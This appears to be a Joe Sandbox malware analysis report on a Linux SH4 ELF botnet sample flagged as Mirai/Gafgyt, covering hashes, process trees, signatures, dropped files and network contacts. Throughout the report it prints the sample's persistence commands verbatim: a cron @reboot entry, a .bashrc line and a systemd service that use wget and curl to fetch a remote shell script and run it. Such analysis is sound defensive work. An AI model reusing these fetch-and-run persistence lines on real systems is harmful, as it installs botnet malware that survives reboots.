Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
sh4.elf

Overview

General Information

Sample name:sh4.elf
Analysis ID:1558941
MD5:16fb41b9eb62b0706fd7824ae6eb8d8d
SHA1:7c99313b0e075431d9b3ee50ecb7f1997ec2cb24
SHA256:3089adf47259ddf51c16169c6abdd428e30f1a43fe129f56b416977652bfe84a
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1558941
Start date and time:2024-11-20 01:00:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:sh4.elf
Detection:MAL
Classification:mal68.troj.linELF@0/4@1/0
Command:/tmp/sh4.elf
PID:6263
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • sh4.elf (PID: 6263, Parent: 6188, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/sh4.elf
    • sh4.elf New Fork (PID: 6265, Parent: 6263)
      • sh4.elf New Fork (PID: 6267, Parent: 6265)
      • sh4.elf New Fork (PID: 6271, Parent: 6265)
      • sh4.elf New Fork (PID: 6273, Parent: 6265)
      • sh4.elf New Fork (PID: 6275, Parent: 6265)
      • sh (PID: 6275, Parent: 6265, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 6277, Parent: 6275)
          • sh New Fork (PID: 6279, Parent: 6277)
          • crontab (PID: 6279, Parent: 6277, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 6280, Parent: 6277)
          • chmod (PID: 6280, Parent: 6277, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 6281, Parent: 6277)
          • sh (PID: 6281, Parent: 6277, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 6282, Parent: 6277)
          • curl (PID: 6282, Parent: 6277, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
          • sh New Fork (PID: 6286, Parent: 6277)
          • chmod (PID: 6286, Parent: 6277, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
        • sh (PID: 6277, Parent: 6275, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
        • sh New Fork (PID: 6278, Parent: 6275)
        • crontab (PID: 6278, Parent: 6275, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • sh4.elf New Fork (PID: 6287, Parent: 6265)
      • sh (PID: 6287, Parent: 6265, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/systemctl enable bot"
        • sh New Fork (PID: 6289, Parent: 6287)
        • systemctl (PID: 6289, Parent: 6287, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot
  • systemd New Fork (PID: 6291, Parent: 6290)
  • snapd-env-generator (PID: 6291, Parent: 6290, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • dash New Fork (PID: 6306, Parent: 4331)
  • rm (PID: 6306, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0
  • dash New Fork (PID: 6307, Parent: 4331)
  • rm (PID: 6307, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: sh4.elfAvira: detected
Source: sh4.elfReversingLabs: Detection: 23%
Source: sh4.elfString: @/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogsh4->unknown%d/bin/busybox/bin/sh/var/SofiatelnetdD
Source: sh4.elfString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: sh4.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
Source: .bashrc.13.drString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.drString: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: /bin/curl (PID: 6282)Reads hosts file: /etc/hostsJump to behavior
Source: /tmp/sh4.elf (PID: 6263)Socket: 127.0.0.1:4161Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: host.zopz-api.com
Source: tmp.xheE4S.22.drString found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.drString found in binary or memory: http://serverip/bins/bins.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39254
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 39254 -> 443
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: @/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogsh4->unknown%d/bin/busybox/bin/sh/var/SofiatelnetdD
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal68.troj.linELF@0/4@1/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6279)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6278)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/sh4.elf (PID: 6265)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 6278)File: /var/spool/cron/crontabs/tmp.xheE4SJump to behavior
Source: /usr/bin/crontab (PID: 6278)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/sh4.elf (PID: 6265)File: /root/.bashrcJump to behavior
Source: /bin/curl (PID: 6282)Directory: /root/.curlrcJump to behavior
Source: /tmp/sh4.elf (PID: 6275)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
Source: /tmp/sh4.elf (PID: 6287)Shell command executed: sh -c "/bin/systemctl enable bot"Jump to behavior
Source: /bin/sh (PID: 6280)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 6286)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /usr/bin/dash (PID: 6306)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0Jump to behavior
Source: /usr/bin/dash (PID: 6307)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0Jump to behavior
Source: /bin/sh (PID: 6289)Systemctl executable: /bin/systemctl -> /bin/systemctl enable botJump to behavior
Source: /tmp/sh4.elf (PID: 6263)Queries kernel information via 'uname': Jump to behavior
Source: /bin/curl (PID: 6282)Queries kernel information via 'uname': Jump to behavior
Source: sh4.elf, 6263.1.00007fff46811000.00007fff46832000.rw-.sdmp, sh4.elf, 6265.1.00007fff46811000.00007fff46832000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
Source: sh4.elf, 6263.1.000055f22484b000.000055f2248d0000.rw-.sdmp, sh4.elf, 6265.1.000055f22484b000.000055f2248d0000.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
Source: sh4.elf, 6263.1.000055f22484b000.000055f2248d0000.rw-.sdmp, sh4.elf, 6265.1.000055f22484b000.000055f2248d0000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
Source: sh4.elf, 6263.1.00007fff46811000.00007fff46832000.rw-.sdmp, sh4.elf, 6265.1.00007fff46811000.00007fff46832000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.elf
Source: sh4.elf, 6265.1.00007fff46811000.00007fff46832000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
File and Directory Permissions Modification
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scheduled Task/Job
1
Scheduled Task/Job
1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Scripting
Login HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558941 Sample: sh4.elf Startdate: 20/11/2024 Architecture: LINUX Score: 68 51 109.202.202.202, 80 INIT7CH Switzerland 2->51 53 host.zopz-api.com 172.111.38.48, 1290, 59274 INCERO-HVVCUS Reserved 2->53 55 2 other IPs or domains 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 10 sh4.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        14 dash rm 2->14         started        16 dash rm 2->16         started        signatures3 process4 process5 18 sh4.elf 10->18         started        file6 47 /root/.bashrc, ASCII 18->47 dropped 61 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 18->61 22 sh4.elf sh 18->22         started        24 sh4.elf sh 18->24         started        26 sh4.elf 18->26         started        28 2 other processes 18->28 signatures7 process8 process9 30 sh crontab 22->30         started        34 sh sh 22->34         started        36 sh systemctl 24->36         started        file10 49 /var/spool/cron/crontabs/tmp.xheE4S, ASCII 30->49 dropped 65 Sample tries to persist itself using cron 30->65 67 Executes the "crontab" command typically for achieving persistence 30->67 38 sh crontab 34->38         started        41 sh chmod 34->41         started        43 sh sh 34->43         started        45 2 other processes 34->45 signatures11 process12 signatures13 63 Executes the "crontab" command typically for achieving persistence 38->63

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
sh4.elf24%ReversingLabsLinux.Backdoor.Gafgyt
sh4.elf100%AviraEXP/ELF.Mirai.W
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
host.zopz-api.com
172.111.38.48
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://serverip/bins/bins.shtmp.xheE4S.22.drfalse
      high
      http://serverip/bins/bins.sh;bot.service.13.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        34.249.145.219
        unknownUnited States
        16509AMAZON-02USfalse
        172.111.38.48
        host.zopz-api.comReserved
        54540INCERO-HVVCUSfalse
        109.202.202.202
        unknownSwitzerland
        13030INIT7CHfalse
        91.189.91.42
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        34.249.145.219m68k.elfGet hashmaliciousUnknownBrowse
          mmb3.elfGet hashmaliciousMirai, OkiruBrowse
            wnbw86.elfGet hashmaliciousMiraiBrowse
              wriww68k.elfGet hashmaliciousMiraiBrowse
                wheiuwa4.elfGet hashmaliciousMiraiBrowse
                  dUqzOmXv5z.elfGet hashmaliciousUnknownBrowse
                    sshd.elfGet hashmaliciousUnknownBrowse
                      tftp.elfGet hashmaliciousUnknownBrowse
                        bot.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                          main_m68k.elfGet hashmaliciousMiraiBrowse
                            172.111.38.48mipsel.elfGet hashmaliciousUnknownBrowse
                              i686.elfGet hashmaliciousUnknownBrowse
                                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                91.189.91.42m68k.elfGet hashmaliciousUnknownBrowse
                                  .i.elfGet hashmaliciousUnknownBrowse
                                    kjsusa6.elfGet hashmaliciousUnknownBrowse
                                      mmb6.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                        mmb9.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                                            mmb1.elfGet hashmaliciousMirai, OkiruBrowse
                                              mmb3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                mmb4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  sshd.elfGet hashmaliciousUnknownBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    host.zopz-api.commipsel.elfGet hashmaliciousUnknownBrowse
                                                    • 172.111.38.48
                                                    i686.elfGet hashmaliciousUnknownBrowse
                                                    • 172.111.38.48
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CANONICAL-ASGBm68k.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    i686.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    armv5l.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    .i.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    kjsusa6.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    mmb6.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 91.189.91.42
                                                    mmb9.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 91.189.91.42
                                                    ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    mmb1.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 91.189.91.42
                                                    mmb3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 91.189.91.42
                                                    INCERO-HVVCUSmipsel.elfGet hashmaliciousUnknownBrowse
                                                    • 172.111.38.48
                                                    i686.elfGet hashmaliciousUnknownBrowse
                                                    • 172.111.38.48
                                                    cIhVfU4Bus.elfGet hashmaliciousMiraiBrowse
                                                    • 172.110.25.149
                                                    b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
                                                    • 23.29.124.10
                                                    https://auth-start-treizor.github.io/Get hashmaliciousUnknownBrowse
                                                    • 23.227.176.186
                                                    https://ambassadorlimo.comGet hashmaliciousUnknownBrowse
                                                    • 198.99.138.98
                                                    https://ambassadorlimo.com/Get hashmaliciousUnknownBrowse
                                                    • 198.99.138.98
                                                    https://link.edgepilot.com/s/58d339fb/mi_L0_elk0K48SZfFk6Q5A?u=http://www.ambassadorlimo.com/Get hashmaliciousUnknownBrowse
                                                    • 198.99.138.98
                                                    http://www.philmauer.com/Get hashmaliciousUnknownBrowse
                                                    • 172.111.52.90
                                                    http://loveevamk.lifeGet hashmaliciousUnknownBrowse
                                                    • 172.111.38.73
                                                    INIT7CHm68k.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    .i.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    kjsusa6.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    mmb6.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 109.202.202.202
                                                    mmb9.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 109.202.202.202
                                                    ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                                                    • 109.202.202.202
                                                    mmb1.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 109.202.202.202
                                                    mmb3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 109.202.202.202
                                                    mmb4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 109.202.202.202
                                                    sshd.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    AMAZON-02USm68k.elfGet hashmaliciousUnknownBrowse
                                                    • 34.249.145.219
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 13.32.110.123
                                                    NTS_eTaxInvoice.htmlGet hashmaliciousUnknownBrowse
                                                    • 3.160.150.2
                                                    QuarantineMessage.zipGet hashmaliciousUnknownBrowse
                                                    • 75.2.57.54
                                                    https://usapress.info/inside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years/Get hashmaliciousUnknownBrowse
                                                    • 52.49.33.63
                                                    https://l.facebook.com/l.php?u=https%3A%2F%2Fusapress.info%2Finside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0r3IVxCUPtQPPqP5Ce0_adoAsiHgG3Oy1cYDq3k1JXBIrTGLtjToxlazM_aem_q02YsKkKY0QB_fm5suzUDw&h=AT1Xo_CkNlagO29_sds-m5zdTBZ6-H70m0J__7wjjmSNinwNGqBfRUFK3cH2zXJWNO7msrJPRkNulrkTmUCLkRNMcfCJTNK-cs4SfUQyRy7nw3vP1DNmFisBvlttaen8fHfi-N3lXN_BGQgdBw&__tn__=R%5D-R&c%5B0%5D=AT3euz91upHKeMVK8p24ktUFKClJ0GKt_3lJnV9tGakx0Tro3u7Ymk1z4tOG4eBZxcuD-Ny10eAla4iUyfdG04Fh4GryHwAMuELGG4dQctfWKiu4mfB-eLJ8Qktnq0ptzD_TaZEPEMHQnvP4W65jDpc-XBmWlMSmaRM-2soPhaPGYAODWegqP8h47S90Q2hmwQvQgUDdb35OgV1duzzqudMAyOk7e8E7mfpnrlwhIvWwUkK53AUNuPTqYkQGet hashmaliciousUnknownBrowse
                                                    • 52.49.33.63
                                                    https://file.privacy-shield.cc/prvcy/PrivacyShield.MsixGet hashmaliciousUnknownBrowse
                                                    • 13.32.121.78
                                                    https://ledger-checks.s3.us-east-1.amazonaws.com/index.htmlGet hashmaliciousUnknownBrowse
                                                    • 52.216.217.10
                                                    Customer forms.pdfGet hashmaliciousUnknownBrowse
                                                    • 13.224.189.74
                                                    https://doc-zionsurgery.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 54.171.97.194
                                                    No context
                                                    No context
                                                    Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):76
                                                    Entropy (8bit):3.7627880354948586
                                                    Encrypted:false
                                                    SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                    MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                    SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                    SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                    SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                    Process:/tmp/sh4.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):178
                                                    Entropy (8bit):4.358630015292201
                                                    Encrypted:false
                                                    SSDEEP:3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
                                                    MD5:C3685F292213652676F734AB36C060EE
                                                    SHA1:1D05F7F6302EC60E7990DE4BBE9180C149EFC731
                                                    SHA-256:D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C
                                                    SHA-512:7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295
                                                    Malicious:true
                                                    Reputation:moderate, very likely benign file
                                                    Preview:./bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".
                                                    Process:/tmp/sh4.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):356
                                                    Entropy (8bit):4.9110117370593995
                                                    Encrypted:false
                                                    SSDEEP:6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
                                                    MD5:F03C70CD4C61A1852F9E19B8FB0D639C
                                                    SHA1:A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008
                                                    SHA-256:AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90
                                                    SHA-512:6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.
                                                    Process:/usr/bin/crontab
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):235
                                                    Entropy (8bit):5.096705576725245
                                                    Encrypted:false
                                                    SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLv5UZHGMQ5UYLtCFt3HY8jsHB:8QjHig898eHLUHY8mB
                                                    MD5:EE376E8DDA98DFB5BFD3968F9C4BCECD
                                                    SHA1:46245E3C67282047008F316830D741AB02462A79
                                                    SHA-256:7D1AB0868EBD5F48D8FEAA69DF735C4BB59198F805BD4D46F3704D2F66FA4F49
                                                    SHA-512:81873155427D9AD2669596EA1DEE1F5B87A7AA57537FF4C7D501D2EA5316CCDD9535815E57DCFEC85DD585916DEC537C797586A9194C0F82728BB20EF600504F
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Nov 19 18:01:32 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://serverip/bins/bins.sh.
                                                    File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                                                    Entropy (8bit):6.865595055633762
                                                    TrID:
                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                    File name:sh4.elf
                                                    File size:67'400 bytes
                                                    MD5:16fb41b9eb62b0706fd7824ae6eb8d8d
                                                    SHA1:7c99313b0e075431d9b3ee50ecb7f1997ec2cb24
                                                    SHA256:3089adf47259ddf51c16169c6abdd428e30f1a43fe129f56b416977652bfe84a
                                                    SHA512:032511c4dbe38e0b1345186900ad3b2e9a286edde415e13ec3bc2b4717e6566c9f730bbfa84c34c5a5ba09a525c552d1911b4f814840d10f79863431311c85e3
                                                    SSDEEP:1536:XTusaMwtrtW+bhFQ5JOdUnHKvH71PUjxCVVLw/o:Djr4Wgh56nqvJUjx9/o
                                                    TLSH:35633A27EA169F46C45760F0A5F28E740B53FC6949630EFAA9A2EEE58143DDCF1043B4
                                                    File Content Preview:.ELF..............*.......@.4...........4. ...(...............@...@...........................A...A......f..........Q.td............................././"O.n........#.*@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

                                                    ELF header

                                                    Class:ELF32
                                                    Data:2's complement, little endian
                                                    Version:1 (current)
                                                    Machine:<unknown>
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x4001a0
                                                    Flags:0x9
                                                    ELF Header Size:52
                                                    Program Header Offset:52
                                                    Program Header Size:32
                                                    Number of Program Headers:3
                                                    Section Header Offset:66840
                                                    Section Header Size:40
                                                    Number of Section Headers:14
                                                    Header String Table Index:13
                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                    NULL0x00x00x00x00x0000
                                                    .initPROGBITS0x4000940x940x300x00x6AX004
                                                    .textPROGBITS0x4000e00xe00xdba00x00x6AX0032
                                                    .finiPROGBITS0x40dc800xdc800x240x00x6AX004
                                                    .rodataPROGBITS0x40dca40xdca40x17040x00x2A004
                                                    .eh_framePROGBITS0x40f3a80xf3a80x40x00x2A004
                                                    .ctorsPROGBITS0x41f3ac0xf3ac0x80x00x3WA004
                                                    .dtorsPROGBITS0x41f3b40xf3b40x80x00x3WA004
                                                    .jcrPROGBITS0x41f3bc0xf3bc0x40x00x3WA004
                                                    .dataPROGBITS0x41f3c00xf3c00x3900x00x3WA004
                                                    .gotPROGBITS0x41f7500xf7500x100x40x3WA004
                                                    .bssNOBITS0x41f7600xf7600x630c0x00x3WA004
                                                    .commentPROGBITS0x00xf7600xd5c0x00x0001
                                                    .shstrtabSTRTAB0x00x104bc0x5b0x00x0001
                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                    LOAD0x00x4000000x4000000xf3ac0xf3ac6.90950x5R E0x10000.init .text .fini .rodata .eh_frame
